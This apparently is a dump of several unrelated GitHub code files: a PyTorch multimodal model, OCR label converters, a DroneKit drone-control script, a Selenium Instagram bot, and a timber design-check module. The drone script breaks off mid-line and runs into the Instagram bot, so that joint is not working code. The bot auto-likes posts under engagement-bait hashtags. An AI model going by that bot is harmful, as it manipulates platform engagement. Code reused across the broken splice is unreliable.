opts.d_ff\n\n self.input = nn.ModuleList()\n for i in range(self.modal_num):\n self.input.append(ProcessInput(opts, num_features // self.modal_num))\n self.dropout_embed = nn.Dropout(p=opts.dropout_embed)\n\n multimodal_encoder_layer = nn.ModuleList()\n for i in range(self.N):\n mm_atten = MultiModalAttention(self.h_mma, self.d_model, self.modal_num, self.dropout_mmatten)\n mt_atten = nn.ModuleList()\n ff = nn.ModuleList()\n for j in range(self.modal_num):\n mt_atten.append(MultiHeadedAttention(self.h, self.d_model, self.dropout_mtatten))\n ff.append(PositionwiseFeedForward(self.d_model, self.d_ff, self.dropout_ff))\n multimodal_encoder_layer.append(MultiModalEncoderLayer(self.d_model, self.modal_num, mm_atten, mt_atten, ff, self.dropout_subconnect))\n\n self.temma = MultiModalEncoder(multimodal_encoder_layer, self.N, self.modal_num)\n self.regress = nn.Sequential(\n nn.Linear(self.d_model * self.modal_num, self.d_model * self.modal_num // 2),\n nn.ReLU(),\n nn.Linear(self.d_model * self.modal_num // 2, opts.ntarget)\n )\n\n for p in self.temma.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n for p in self.input.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n for p in self.regress.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n\n def forward(self, x):\n\n _x = torch.chunk(x, self.modal_num, dim=-1)\n _x_list = []\n for i in range(self.modal_num):\n _x_list.append(self.input[i](_x[i]))\n x = torch.cat(_x_list, dim=-1)\n\n x = self.dropout_embed(x)\n\n mask = []\n for i in range(self.modal_num):\n mask.append(generate_mask_bidirectional(x.shape[1], self.mask_a_length[i], self.mask_b_length[i]))\n x = self.temma(x, mask)\n\n return self.regress(x)\n","repo_name":"Sunner4nwpu/TEMMA","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":15384,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"19963017914","text":"import torch\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\nclass CTCLabelConverter(object):\n \"\"\" 텍스트 레이블과 텍스트 인덱스 간에 변환 \"\"\"\n\n def __init__(self, character):\n # character (str): 사용 가능한 문자 집합.\n dict_character = list(character)\n\n self.dict = {}\n for i, char in enumerate(dict_character):\n # 참고: 0은(는) CTCloss에 필요한 'CTCblank' 토큰용으로 예약되었습니다.\n self.dict[char] = i + 1\n\n self.character = ['[CTCblank]'] + dict_character # CTCloss에 대한 더미 '[CTCblank]' 토큰(인덱스 0)\n # 0 + character? \n\n def encode(self, text, batch_max_length=25):\n \"\"\"텍스트 레이블을 텍스트 인덱스로 변환합니다.\n input:\n text: 각 이미지의 텍스트 레이블입니다. [sig_size]\n batch_max_length: 배치에 포함된 텍스트 레이블의 최대 길이. 기본적으로 25\n\n output:\n text: CTLoss에 대한 텍스트 인덱스. [batch_size, batch_max_length] \n length: 각 텍스트의 길이입니다. [sig_size]\n \"\"\"\n length = [len(s) for s in text] # 각 텍스트 레이블의 길이를 구해서 저장 \n\n # 패딩에 사용되는 지수(=0)는 CTC loss 계산에 영향을 미치지 않습니다. 모든 label 동일 길이, 여유자리는 0으로 채움\n batch_text = torch.LongTensor(len(text), batch_max_length).fill_(0)\n for i, t in enumerate(text):\n text = list(t)\n text = [self.dict[char] for char in text]\n batch_text[i][:len(text)] = torch.LongTensor(text)\n return (batch_text.to(device), torch.IntTensor(length).to(device))\n\n def decode(self, text_index, length):\n \"\"\" 텍스트 인덱스를 텍스트 레이블로 변환합니다. \"\"\"\n texts = []\n for index, l in enumerate(length):\n t = text_index[index, :]\n\n char_list = []\n for i in range(l): \n if t[i] != 0 and (not (i > 0 and t[i - 1] == t[i])): # 반복된 문자와 공백을 제거합니다.\n char_list.append(self.character[t[i]])\n text = ''.join(char_list)\n\n texts.append(text)\n return texts\n\n\nclass CTCLabelConverterForBaiduWarpctc(object):\n \"\"\" baidu warpctc에 대한 text-label과 text-index 사이에서 변환 \"\"\"\n\n def __init__(self, character):\n # character (str): set of the possible characters.\n dict_character = list(character)\n\n self.dict = {}\n for i, char in enumerate(dict_character):\n # NOTE: 0 is reserved for 'CTCblank' token required by CTCLoss\n self.dict[char] = i + 1\n\n self.character = ['[CTCblank]'] + dict_character # CTCloss에 대한 더미 '[CTCblank]' 토큰(인덱스 0)\n\n def encode(self, text, batch_max_length=25):\n \"\"\"텍스트 레이블을 텍스트 인덱스로 변환합니다.\n input:\n text: 각 이미지의 텍스트 레이블입니다. [sig_size]\n output:\n text: CTCLoss에 대한 연결된 텍스트 인덱스.\n [sum(text_index_0)] = [text_index_0 + text_index_1 + ... + text_index_(n - 1)]\n length: 각 텍스트의 길이입니다. [sig_size]\n \"\"\"\n length = [len(s) for s in text]\n text = ''.join(text)\n text = [self.dict[char] for char in text]\n\n return (torch.IntTensor(text), torch.IntTensor(length))\n\n def decode(self, text_index, length):\n \"\"\" convert text-index into text-label. \"\"\"\n texts = []\n index = 0\n for l in length:\n t = text_index[index:index + l]\n\n char_list = []\n for i in range(l):\n if t[i] != 0 and (not (i > 0 and t[i - 1] == t[i])): # 반복된 문자와 공백을 제거합니다.\n char_list.append(self.character[t[i]])\n text = ''.join(char_list)\n\n texts.append(text)\n index += l\n return texts\n\n\nclass AttnLabelConverter(object):\n \"\"\" Convert between text-label and text-index \"\"\"\n\n def __init__(self, character):\n # character (str): 사용 가능한 문자 집합.\n # [GO] 주의 디코더의 시작 토큰입니다. [s] 토큰을 사용할 수 있습니다. \n # [GO]는 시작 토큰, 대응 인덱스 0, [s]는 종료 토큰, 대응 인덱스 1\n list_token = ['[GO]', '[s]'] # ['[s]','[UNK]','[PAD]','[GO]']\n list_character = list(character)\n self.character = list_token + list_character\n\n self.dict = {}\n for i, char in enumerate(self.character):\n # print(i, char)\n self.dict[char] = i\n\n def encode(self, text, batch_max_length=25):\n \"\"\" 텍스트 레이블을 텍스트 색인으로 변환합니다.\n input:\n text: text labels of each image. [batch_size] 각 요소는 문자열입니다.\n batch_max_length: 배치에 포함된 텍스트 레이블의 최대 길이. 기본적으로 25\n\n output:\n text : 주의 디코더 입력. [batch_size x (max_length+2)] [GO] 토큰의 경우 +1이고 [s] 토큰의 경우 +1입니다.\n text[:, 0]은 [GO] 토큰이고 텍스트는 [s] 토큰 뒤에 [GO] 토큰으로 채워집니다.\n length : [s] 토큰도 카운트하는 주의 디코더의 출력 길이입니다. [3, 7, …] [sig_size]\n attention의 경우 출력 라벨은 \"03534534610000...\"입니다. 여기서 0은 GO, 1은 S, S는 모두 GO로 채워집니다. 길이batch_max_length + 2로\n \"\"\"\n length = [len(s) + 1 for s in text] # 문장 끝에 [s]에 대해 +1입니다. [GO]不需要计入长度\n # batch_max_length = max(length) # 다중 모드 설정에는 허용되지 않습니다.\n batch_max_length += 1\n # 첫 번째 단계에서 [GO]에 대해 +1을 추가합니다. batch_text는 [s] 토큰 뒤에 [GO] 토큰으로 패딩됩니다. [s]之后的用[GO]也就是0补齐\n batch_text = torch.LongTensor(len(text), batch_max_length + 1).fill_(0) #길이가 batch_max_length + 2인 것과 같습니다\n for i, t in enumerate(text):\n text = list(t)\n text.append('[s]')\n text = [self.dict[char] for char in text] \n batch_text[i][1:1 + len(text)] = torch.LongTensor(text) # batch_text[:, 0] = [GO] token\n return (batch_text.to(device), torch.IntTensor(length).to(device)) #length 벡터의 길이는 batch_max_length + 1입니다. 즉, [GO]는 길이를 포함하지 않습니다.\n\n def decode(self, text_index, length): # length는 attention에서 사용할 수 없고 CTCloss에서 사용할 수 있습니다. 포맷을 통일합니다.\n \"\"\" convert text-index into text-label. \"\"\"\n texts = []\n for index, l in enumerate(length):\n text = ''.join([self.character[i] for i in text_index[index, :]])\n texts.append(text)\n return texts\n\n\nclass Averager(object):\n \"\"\"토치의 평균을 계산합니다.손실 평균에 사용되는 텐서.\"\"\"\n\n def __init__(self):\n self.reset()\n\n def add(self, v):\n count = v.data.numel() # 텐서 속 원소의 수를 되돌리면 loss는 1이 된다.\n v = v.data.sum() # Tensor의 모든 원소의 합을 되돌리는 것은 loss에 있어서 loss 자체의 값이다.\n self.n_count += count\n self.sum += v\n\n def reset(self):\n self.n_count = 0\n self.sum = 0\n\n def val(self):\n res = 0\n if self.n_count != 0:\n res = self.sum / float(self.n_count)\n return res\n","repo_name":"dudco0040/dudco0040","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7752,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12399566346","text":"## Functions\nfrom dronekit import connect, VehicleMode, LocationGlobalRelative\nfrom pymavlink import mavutil\nimport time\nimport geopy\nimport geopy.distance\nfrom geopy.distance import great_circle\nimport math\nimport threading\nimport zmq\n# import io\n# import picamera\n# import struct\ncontext = zmq.Context() # Create a ZeroMQ context\nimport time\nimport json\nimport wiringpi\n\n# use 'GPIO naming'\nwiringpi.wiringPiSetupGpio()\n\n# set #18 to be a PWM output\nwiringpi.pinMode(18, wiringpi.GPIO.PWM_OUTPUT)\n\n# set the PWM mode to milliseconds stype\nwiringpi.pwmSetMode(wiringpi.GPIO.PWM_MODE_MS)\n\n# divide down clock\nwiringpi.pwmSetClock(192)\nwiringpi.pwmSetRange(2000)\n\nd1 = None\nd2 = None\nselected_drone = None\nMCU_host = '192.168.207.122'\nCD1_host = '192.168.207.43'\nCD2_host = '192.168.207.225'\nCD3_host = CD2_host\ncmd_port = 12345\nctrl_port = 54321\ndrone_list = []\nwait_for_command = True\nimmediate_command_str = None\nmissions = {}\n\nclass Drone:\n \n def __init__(self,name,connection_string, baud=None):\n self.vehicle = connect(connection_string, baud = baud)\n self.drone_user = connection_string\n self.drone_baud = baud\n self.name = name\n self.posalt = 2\n self.in_air = False\n self.no_vel_cmds = True\n self.pid_velx = {'P': 0.8, 'I': 0.0, 'D': 0.1}\n self.pid_vely = {'P': 0.8, 'I': 0.0, 'D': 0.1}\n self.pid_velz = {'P': 0.5, 'I': 0.0, 'D': 0.1}\n self.prev_error_velx = 0.0\n self.prev_error_vely = 0.0\n self.prev_error_velz = 0.0\n self.integral_velx = 0.0\n self.integral_vely = 0.0\n self.integral_velz = 0.0\n self.alt_ach = False\n self.prev_timestamp = time.time()\n\n\n def is_wifi_connected(self):\n try:\n wifi = context.socket(zmq.REQ)\n wifi.connect('tcp://192.168.207.101:8888')\n\n # Perform the check twice\n poller = zmq.Poller()\n poller.register(wifi, zmq.POLLIN)\n wifi.send_string(\"check\")\n\n if poller.poll(3000):\n response1 = wifi.recv_string()\n wifi.send_string(\"check\")\n if poller.poll(3000):\n response2 = wifi.recv_string()\n wifi.send_string(\"check\")\n if poller.poll(3000):\n response3 = wifi.recv_string()\n\n if response1 == \"Connected\" or response2 == \"Connected\" or response3 == \"Connected\":\n return True\n else:\n return False\n\n except Exception as e:\n print(f\"Error checking Wi-Fi: {e}\")\n return False\n\n finally:\n if wifi:\n wifi.close()\n\n\n def poshold_guided(self):\n while True:\n try:\n self.altitude = self.vehicle.location.global_relative_frame.alt\n velx = self.vehicle.velocity[0]\n vely = self.vehicle.velocity[1]\n velz = self.vehicle.velocity[2]\n if self.in_air:\n if self.no_vel_cmds:\n current_timestamp = time.time()\n dt = current_timestamp - self.prev_timestamp\n self.prev_timestamp = current_timestamp\n # Use PID controllers for velx and vely\n pid_output_velx = self.calculate_pid_output(velx, self.pid_velx, 'velx',dt)\n pid_output_vely = self.calculate_pid_output(vely, self.pid_vely, 'vely',dt)\n pid_output_velz = self.calculate_pid_output(velz, self.pid_velz, 'velz',dt)\n if pid_output_velx > 2:\n pid_output_velx = 2\n if pid_output_vely > 2:\n pid_output_vely = 2\n if pid_output_velx < -2:\n pid_output_velx = -2\n if pid_output_vely < -2:\n pid_output_vely = -2\n if pid_output_velz > 2:\n pid_output_velz = 2\n if pid_output_velz > 2:\n pid_output_velz = 2\n\n self.send_ned_velocity_drone(pid_output_velx, pid_output_vely, pid_output_velz)\n time.sleep(0.2)\n if not self.in_air:\n break\n\n \n except Exception as e:\n log(\"Poshold_Guided Error: {}\".format(e))\n\n def calculate_pid_output(self, current_value, pid_params, axis, dt):\n # Proportional term\n error = 0.0 - current_value\n proportional = pid_params['P'] * error\n \n # Integral term\n if axis == 'velx':\n self.integral_velx += error * dt # Accumulate error over time\n integral = pid_params['I'] * self.integral_velx\n elif axis == 'vely':\n self.integral_vely += error * dt\n integral = pid_params['I'] * self.integral_vely\n elif axis == 'velz':\n self.integral_velz += error * dt\n integral = pid_params['I'] * self.integral_velz\n else:\n integral = 0.0\n\n if not self.no_vel_cmds:\n integral = 0.0\n\n # Derivative term\n\n if axis == 'velx':\n derivative = pid_params['D'] * ((error - self.prev_error_velx) / dt) # dt: time difference\n self.prev_error_velx = error\n elif axis == 'vely':\n derivative = pid_params['D'] * ((error - self.prev_error_vely) / dt)\n self.prev_error_vely = error\n elif axis == 'velz':\n derivative = pid_params['D'] * ((error - self.prev_error_velz) / dt)\n self.prev_error_velz = error\n else:\n derivative = 0.0\n\n\n # Summing up all terms\n pid_output = proportional + integral + derivative\n\n return pid_output\n\n def security(self):\n self.altitude = self.vehicle.location.global_relative_frame.alt\n self.battery = self.vehicle.battery.voltage\n log(f\"{self.name}'s Security checkup started!\")\n # threading.Thread(target=self.poshold_guided).start()\n\n while True:\n try:\n self.altitude = self.vehicle.location.global_relative_frame.alt\n self.battery = self.vehicle.battery.voltage\n self.wifi_status = self.is_wifi_connected()\n self.mode = self.vehicle.mode\n velx = self.vehicle.velocity[0]\n vely = self.vehicle.velocity[1]\n log('sec {} PosAlt: {}m \\n Current altitude : {}m\\n Current Battery {}V\\n Alt Difference {}\\n Wifi Status {}\\n{}'.format(self.name,self.posalt, self.altitude, self.battery, self.altitude - self.posalt, str(self.wifi_status), str(self.mode)))\n coordlat = str(self.vehicle.location.global_relative_frame.lat)\n coordlon = str(self.vehicle.location.global_relative_frame.lon)\n log(\"lat {}\".format(coordlat))\n log(\"lon {}\".format(coordlon))\n if not self.wifi_status:\n print(\"{} Wi-Fi connection lost! Initiating landing.\".format(self.name))\n self.land()\n self.disarm()\n if self.altitude > 5:\n log(\"sec {} Altitude greater than 5 meters! Initiating landing.\".format(self.name))\n self.land()\n if self.battery < 10.5:\n log(\"sec {} Battery LOW, Landing\".format(self.name))\n self.land()\n time.sleep(4)\n except Exception as e:\n log(\"sec {} Security Error : {}\".format(self.name,e))\n pass\n\n def reconnect(self):\n try:\n self.vehicle.close()\n self = None\n time.sleep(2)\n log(\"Reconnected Successfully\")\n except Exception as e:\n log(f\"Error during reconnection: {e}\")\n\n def arm(self, mode='GUIDED'):\n try:\n log(\"Arming motors\")\n self.vehicle.mode = VehicleMode(mode)\n self.vehicle.armed = True\n TIMEOUT_SECONDS = 10\n start_time = time.time()\n while not self.vehicle.armed:\n log(\"Waiting for Arming\")\n self.vehicle.armed = True\n if time.time() - start_time > TIMEOUT_SECONDS:\n break\n time.sleep(1)\n\n log(\"Vehicle Armed\")\n except Exception as e:\n log(f\"Error during arming: {e}\")\n\n def takeoff(self, alt=2):\n try:\n self.arm()\n log(\"Taking off!\")\n self.vehicle.simple_takeoff(alt)\n start_time = time.time()\n TIMEOUT_SECONDS = 15\n self.posalt = alt\n while True:\n current_altitude = self.vehicle.location.global_relative_frame.alt\n if current_altitude is not None:\n log(\" Altitude: {}\".format(current_altitude))\n if current_altitude >= 1 * 0.9:\n log(\"Reached target altitude\")\n break\n else:\n log(\"Waiting for altitude information...\")\n if time.time() - start_time > TIMEOUT_SECONDS:\n break\n time.sleep(1)\n self.in_air = True\n self.alt_ach = False\n except Exception as e:\n log(f\"Error during takeoff: {e}\")\n\n def send_ned_velocity_drone(self, velocity_x, velocity_y, velocity_z):\n try:\n velocity_x = float(velocity_x)\n velocity_y = float(velocity_y)\n velocity_z = float(velocity_z)\n\n msg = self.vehicle.message_factory.set_position_target_local_ned_encode(\n 0, # time_boot_ms (not used)\n 0, 0, # target system, target component\n mavutil.mavlink.MAV_FRAME_LOCAL_NED, # frame\n 0b0000111111000111, # type_mask (only speeds enabled)\n 0, 0, 0, # x, y, z positions (not used)\n velocity_x, velocity_y, velocity_z, # x, y, z velocity in m/s\n 0, 0, 0, # x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)\n 0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)\n\n self.vehicle.send_mavlink(msg)\n log(\"Drone Velocity : {}, {}, {}\".format(velocity_x,velocity_y,velocity_z))\n\n except Exception as e:\n log(f\"Error sending velocity commands: {e}\")\n\n def send_ned_velocity(self, x, y, z, duration = None):\n self.no_vel_cmds = False\n if duration:\n for i in range(0,duration):\n self.send_ned_velocity_drone(x,y,z)\n log(i)\n time.sleep(1)\n\n self.send_ned_velocity_drone(0,0,0)\n time.sleep(1)\n self.no_vel_cmds = True\n \n else:\n self.send_ned_velocity_drone(x,y,z)\n time.sleep(1)\n self.no_vel_cmds = True\n\n def yaw(self, heading):\n try:\n current_heading = self.vehicle.heading\n log(\"Current Heading : {}\".format(current_heading))\n if heading - current_heading <= 0:\n rotation = 1\n else:\n rotation = -1\n estimatedTime = heading / 30.0 + 1\n\n msg = self.vehicle.message_factory.command_long_encode(\n 0, 0, # target system, target component\n mavutil.mavlink.MAV_CMD_CONDITION_YAW, # command\n 0, # confirmation\n heading, # param 1, yaw in degrees\n 0, # param 2, yaw speed deg/s\n rotation, # param 3, direction -1 ccw, 1 cw\n 0, # param 4, relative offset 1, absolute angle 0\n 0, 0, 0) # param 5 ~ 7 not used\n # send command to vehicle\n self.vehicle.send_mavlink(msg)\n\n # Wait sort of time for the command to be fully executed.\n for t in range(0, int(math.ceil(estimatedTime))):\n time.sleep(1)\n log('{} - Executed yaw(heading={}) for {} seconds.'.format(time.ctime(), heading, t + 1))\n except Exception as e:\n log(f\"Error during yaw command: {e}\")\n\n def servo(self,cmd):\n delay_period = 0.01\n close = 'close'\n open = 'open'\n try:\n if cmd == 'close' or cmd == close:\n for pulse in range(50, 250, 1):\n wiringpi.pwmWrite(18, pulse)\n time.sleep(delay_period)\n if cmd == 'open' or cmd == open:\n for pulse in range(250, 50, -1):\n wiringpi.pwmWrite(18, pulse)\n time.sleep(delay_period)\n log('setting servo to {}'.format(cmd))\n except Exception as e:\n log(f\"Error during servo command: {e}\")\n\n def disarm(self):\n try:\n log(\"Disarming motors\")\n self.vehicle.armed = False\n\n while self.vehicle.armed:\n log(\"Waiting for disarming...\")\n self.vehicle.armed = False\n time.sleep(1)\n\n log(\"Vehicle Disarmed\")\n except Exception as e:\n log(f\"Error during disarming: {e}\")\n\n def land(self):\n try:\n self.vehicle.mode = VehicleMode(\"LAND\")\n log(\"Landing\")\n self.in_air = False\n except Exception as e:\n log(f\"Error during landing: {e}\")\n\n def poshold(self):\n try:\n self.vehicle.mode = VehicleMode(\"POSHOLD\")\n log(\"Drone currently in POSHOLD\")\n except Exception as e:\n log(f\"Error during POSHOLD mode setting: {e}\")\n\n def rtl(self):\n try:\n self.vehicle.mode = VehicleMode(\"RTL\")\n log(\"Drone currently in RTL\")\n self.in_air = False\n except Exception as e:\n log(f\"Error during RTL mode setting: {e}\")\n\n def exit(self):\n try:\n self.vehicle.close()\n except Exception as e:\n log(f\"Error during vehicle exit: {e}\")\n\n def get_vehicle_state(self):\n try:\n log_msg = (\n '{} - Checking current Vehicle Status:\\n'\n ' Global Location: lat={}, lon={}, alt(above sea level)={}\\n'\n ' Global Location (relative altitude): lat={}, lon={}, alt(relative)={}\\n'\n ' Local Location(NED coordinate): north={}, east={}, down={}\\n'\n ' Velocity: Vx={}, Vy={}, Vz={}\\n'\n ' GPS Info: fix_type={}, num_sat={}\\n'\n ' Battery: voltage={}V, current={}A, level={}%\\n'\n ' Heading: {} (degrees from North)\\n'\n ' Groundspeed: {} m/s\\n'\n ' Airspeed: {} m/s'\n ).format(\n time.ctime(),\n self.vehicle.location.global_frame.lat, self.vehicle.location.global_frame.lon,\n self.vehicle.location.global_frame.alt,\n self.vehicle.location.global_relative_frame.lat, self.vehicle.location.global_relative_frame.lon,\n self.vehicle.location.global_relative_frame.alt,\n self.vehicle.location.local_frame.north, self.vehicle.location.local_frame.east,\n self.vehicle.location.local_frame.down,\n self.vehicle.velocity[0], self.vehicle.velocity[1], self.vehicle.velocity[2],\n self.vehicle.gps_0.fix_type, self.vehicle.gps_0.satellites_visible,\n self.vehicle.battery.voltage, self.vehicle.battery.current, self.vehicle.battery.level,\n self.vehicle.heading, self.vehicle.groundspeed, self.vehicle.airspeed\n )\n\n log(log_msg)\n\n\n except Exception as e:\n log(f\"Error getting vehicle state: {e}\")\n\n def goto(self, l, alt, groundspeed=0.7):\n try:\n log('\\n')\n log('{} - Calling goto_gps_location_relative(lat={}, lon={}, alt={}, groundspeed={}).'.format(\n time.ctime(), l[0], l[1], alt, groundspeed))\n destination = LocationGlobalRelative(l[0], l[1], alt)\n log('{} - Before calling goto_gps_location_relative(), vehicle state is:'.format(time.ctime()))\n self.get_vehicle_state()\n current_lat = self.vehicle.location.global_relative_frame.lat\n current_lon = self.vehicle.location.global_relative_frame.lon\n current_alt = self.vehicle.location.global_relative_frame.alt\n while ((self.distance_between_two_gps_coord((current_lat, current_lon), l) > 0.5) or (\n abs(current_alt - alt) > 0.3)):\n self.vehicle.simple_goto(destination, groundspeed=groundspeed)\n time.sleep(0.5)\n current_lat = self.vehicle.location.global_relative_frame.lat\n current_lon = self.vehicle.location.global_relative_frame.lon\n current_alt = self.vehicle.location.global_relative_frame.alt\n log('{} - Horizontal distance to destination: {} m.'.format(time.ctime(),\n self.distance_between_two_gps_coord(\n (current_lat, current_lon), l)))\n log('{} - Perpendicular distance to destination: {} m.'.format(time.ctime(),\n current_alt - alt))\n log('{} - After calling goto_gps_location_relative(), vehicle state is:'.format(time.ctime()))\n self.get_vehicle_state()\n except Exception as e:\n log(f\"Error during goto command: {e}\")\n\n def distance_between_two_gps_coord(self, point1, point2):\n try:\n distance = great_circle(point1, point2).meters\n return distance\n except Exception as e:\n log(f\"Error calculating distance between two GPS coordinates: {e}\")\n\n\n#=============================================================================================================\n \ndef new_coords(original_gps_coord, displacement, rotation_degree_relative):\n try:\n vincentyDistance = geopy.distance.distance(meters=displacement)\n original_point = geopy.Point(original_gps_coord[0], original_gps_coord[1])\n new_gps_coord = vincentyDistance.destination(point=original_point, bearing=rotation_degree_relative)\n new_gps_lat = new_gps_coord.latitude\n new_gps_lon = new_gps_coord.longitude\n\n return round(new_gps_lat, 7), round(new_gps_lon, 7)\n except Exception as e:\n log(f\"Error in calculating new coordinates: {e}\")\n\ndef cu_lo(drone):\n try:\n lat = drone.vehicle.location.global_relative_frame.lat\n lon = drone.vehicle.location.global_relative_frame.lon\n heading = drone.vehicle.heading\n return (lat, lon), heading\n except Exception as e:\n log(f\"Error in getting current location: {e}\")\n return (0.0, 0.0), 0.0 # Returning default values in case of an error\n \ndef check_distance(d1,d2):\n try:\n log(\"First drone's current location{}\".format(cu_lo(d1)))\n log(\"Second drone's current location{}\".format(cu_lo(d2)))\n distance = d1.distance_between_two_gps_coord(cu_lo(d1)[0],cu_lo(d2)[0])\n log(\"Distance between those drones is {} meters\".format(distance))\n \n except Exception as e:\n log(f\"Error in check_distance: {e}\")\n\n\n\n#==============================================================================================================\n\nconnected_hosts = set()\nclients = {}\npc = '192.168.207.101'\n\nimport random\n\ndef send(host, immediate_command_str):\n global connected_hosts\n global clients\n\n if host not in connected_hosts:\n context = zmq.Context()\n socket1 = context.socket(zmq.PUSH)\n socket1.connect(f\"tcp://{host}:12345\")\n socket2 = context.socket(zmq.PUSH)\n socket2.connect(f\"tcp://{host}:12345\")\n socket3 = context.socket(zmq.PUSH)\n socket3.connect(f\"tcp://{host}:12345\")\n clients[host] = [socket1,socket2,socket3]\n connected_hosts.add(host)\n immediate_command_str = str(immediate_command_str)\n random_socket = random.choice(clients[host])\n random_socket.send_string(immediate_command_str)\n\n# def camera_stream_server(host):\n# def handle_client(client_socket):\n# connection = client_socket.makefile('wb')\n\n# try:\n# with picamera.PiCamera() as camera:\n# camera.resolution = (640, 480) # Adjust resolution as needed\n# camera.framerate = 30 # Adjust frame rate as needed\n\n# # Start capturing and sending the video feed\n# time.sleep(2) # Give the camera some time to warm up\n# stream = io.BytesIO()\n# for _ in camera.capture_continuous(stream, 'jpeg', use_video_port=True):\n# stream.seek(0)\n# image_data = stream.read()\n\n# # Send the image size to the client\n# connection.write(struct.pack('= 4:\n break\n\n picture.click()\n sleep(sleepy_time)\n\n heart = driver.find_element_by_css_selector('svg[aria-label=\"Like\"]')\n heart.click()\n print('> Image liked')\n sleep(3)\n\n close_pic = driver.find_element_by_css_selector('[aria-label=\"Close\"]')\n close_pic.click()\n sleep(3)\n\n image_count += 1\n #print(image_count, \"images liked\")\n sleep(sleepy_time)\n\ndef main():\n driver = webdriver.Chrome('/Users/user/PycharmProjects/igbot1/chromedriver')\n login(driver)\n\n tags = [\n 'f4f',\n 'l4l',\n 'lifestyle',\n 'happy'\n ]\n\n for tag in tags:\n open_tag(driver, f\"https://www.instagram.com/explore/tags/{tag}\")\n print('Done with', tag)\n\nmain()\n\nfile_tracker = open('igbot_tracker.txt', '+a')\nfhand = file_tracker\n\nlinecount = 0\n\nfhand.write('\\nRun')\n\nfhand.seek(0)\nfor lines in fhand:\n linecount += 1\n\nprint(linecount)","repo_name":"blockchainaddict/IGBot","sub_path":"botX_chrm.py","file_name":"botX_chrm.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25811295715","text":"# -*- coding: utf-8 -*-\n''' Classes and functions for limit state checking according to the\n National Design Specification of the American Wood Council.'''\n\nfrom __future__ import print_function\nfrom __future__ import division\n\n__author__= \"Ana Ortega (AO_O) Luis C. Pérez Tato (LCPT)\"\n__copyright__= \"Copyright 2022 LCPT\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"ana.ortega@ciccp.es, l.pereztato@gmail.com\"\n\nimport sys\nimport math\nimport geom\nimport xc\nfrom misc_utils import log_messages as lmsg\nfrom materials import member_base\nfrom materials import wood_member_base\nfrom materials import limit_state_checking_base as lsc\nfrom materials.awc_nds import AWCNDS_materials\nfrom postprocess import control_vars as cv\nfrom misc_utils import units_utils\nfrom model import predefined_spaces\nfrom actions import load_cases as lcm\nfrom solution import predefined_solutions\n\nclass Member(wood_member_base.Member):\n ''' Beam and column members according to AWC NDS-2018. This class\n exists to compute and update the values of the buckling reduction\n factors of the members (chiN, chiLT, FcE and FbE).\n\n :ivar unbracedLengthX: unbraced length for torsional buckling \n about the longitudinal axis.\n :ivar unbracedLengthY: unbraced length for flexural buckling \n about y-axis.\n :ivar unbracedLengthZ: unbraced length for flexural buckling \n about z-axis.\n :ivar Cr: repetitive member factor.\n :ivar connection: connection type at member ends.\n :ivar memberRestraint: Member restrain condition according to clause 4.4.1.2 of AWC_NDS2018.\n :ivar memberLoadingCondition: parameters defining the member condition in order to obtain \n its effective length accordint to table 3.3.3 of AWC NDS-2018.\n :ivar loadCombDurationFactorFunction: function that returns the load \n duration factor corresponding to\n a load combination expression\n (e.g.: 1.0*deadLoad+0.7*windLoad).\n '''\n def __init__(self, name, section, unbracedLengthX, unbracedLengthY= None, unbracedLengthZ= None, Cr= 1.0, connection= member_base.MemberConnection(), memberRestraint= AWCNDS_materials.MemberRestraint.notApplicable, memberLoadingCondition= AWCNDS_materials.MemberLoadingCondition(), loadCombDurationFactorFunction= None, lstLines=None):\n ''' Constructor. \n\n :param name: object name.\n :param section: timber cross-section.\n :param Cr: repetitive member factor.\n :param unbracedLengthX: unbraced length for torsional buckling \n about the longitudinal axis.\n :param unbracedLengthY: unbraced length for flexural buckling \n about y-axis.\n :param unbracedLengthZ: unbraced length for flexural buckling \n about z-axis.\n :param connection: connection type at member ends.\n :param memberRestraint: Member restrain condition according to clause 4.4.1.2 of AWC_NDS2018.\n :param memberLoadingCondition: parameters defining the member condition in order to obtain \n its effective length accordint to table 3.3.3 of AWC NDS-2018.\n :param loadCombDurationFactorFunction: function that returns the load \n duration factor corresponding to\n a load combination expression\n (e.g.: 1.0*deadLoad+0.7*windLoad).\n :param lstLines: ordered list of lines that make up the beam.\n '''\n super(Member,self).__init__(name, section, lstLines)\n self.unbracedLengthX= unbracedLengthX\n if(unbracedLengthY):\n self.unbracedLengthY= unbracedLengthY\n else:\n self.unbracedLengthY= unbracedLengthX\n if(unbracedLengthZ):\n self.unbracedLengthZ= unbracedLengthZ\n else:\n self.unbracedLengthZ= unbracedLengthX\n self.crossSection.Cr= Cr\n self.connection= connection\n self.memberRestraint= memberRestraint\n self.memberLoadingCondition= memberLoadingCondition\n self.loadCombDurationFactorFunction= loadCombDurationFactorFunction\n \n def getFcAdj(self):\n ''' Return the adjusted value of Fc including the column stability\n factor.'''\n sectionFbAdj= self.crossSection.getFcAdj()\n CP= self.getColumnStabilityFactor()\n return CP*sectionFbAdj\n \n def getFbAdj(self, majorAxis= True):\n ''' Return the adjusted value of Fb including the beam stability factor.\n\n :param majorAxis: if true return adjusted Fb for bending around major axis.\n '''\n sectionFbAdj= self.crossSection.getFbAdj(majorAxis= majorAxis)\n CL= self.getBeamStabilityFactor()\n return CL*sectionFbAdj\n \n def getFtAdj(self):\n ''' Return the adjusted value of Ft.'''\n return self.crossSection.getFtAdj() \n \n def getEffectiveBucklingLengthCoefficientRecommended(self):\n '''Return the column effective buckling length coefficients\n according to NDS 2018 appendix G'''\n return self.connection.getEffectiveBucklingLengthCoefficientRecommended()\n \n def getColumnSlendernessRatioB(self):\n ''' Return the slenderness ratio of the member working as\n column for bending in the H 